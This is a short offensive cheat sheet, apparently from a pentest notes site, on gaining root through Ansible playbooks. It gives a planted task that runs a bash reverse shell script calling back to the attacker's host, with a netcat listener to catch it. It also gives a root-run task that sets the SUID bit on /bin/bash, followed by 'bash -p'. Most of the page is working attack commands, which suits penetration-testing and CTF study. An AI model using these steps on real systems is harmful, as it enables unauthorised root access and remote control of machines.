# Ansible Playbook Privilege Escalation

### [PrivEsc with Tasks](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/ansible-playbook-privilege-escalation/#privesc-with-tasks) <a href="#privesc-with-tasks" id="privesc-with-tasks"></a>

First off, check the content of playbook in **`/opt/ansible/playbooks`**.\
For instance, a file named **“httpd.yaml”**.

```yaml
- name: Install and configure Apache
  ...
  roles:
    - role: geerlingguy.apache
  tasks:
    - name: configure firewall
      firewalld:
        ...
Copied!
```

Next, check the content of configure files in **`/opt/ansible/roles/geerlingguy.apache/tasks`**.\
And add the exploitable file in this.\
For example, a file named **`“shell.yml”`**.

```yaml
- hosts: localhost
  tasks:
    - name: RShell
      command: sudo bash /tmp/root.sh
Copied!
```

Create a exploit for reverse shell.

```sh
echo '/bin/bash -i >& /dev/tcp/<local-ip>/<local-port> 0>&1' > /tmp/root.sh
Copied!
```

Then open a listener in local machine.

```sh
nc -lvnp <local-port>
Copied!
```

At the end, execute **“ansible”**

```sh
ansible
# or
ansible-playbook  
# or
sudo -u <some-user> ansible
Copied!
```

<br>

### [PrivEsc with Automation Task](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/ansible-playbook-privilege-escalation/#privesc-with-automation-task) <a href="#privesc-with-automation-task" id="privesc-with-automation-task"></a>

If the target system runs automation tasks with Ansible Playbook as root and we have write permission of task files (**`tasks/`**), we can inject arbitrary commands in **yaml** file.\
For example, create a new file **`/opt/ansible/tasks/evil.yaml`**.

```yaml
- hosts: localhost
	tasks:
	  - name: Evil
	    ansible.builtin.shell: |
	      chmod +s /bin/bash
	    become: true
Copied!
```

After a while, we can escalate the root privilege by executing the following command.

```sh
/bin/bash -p
```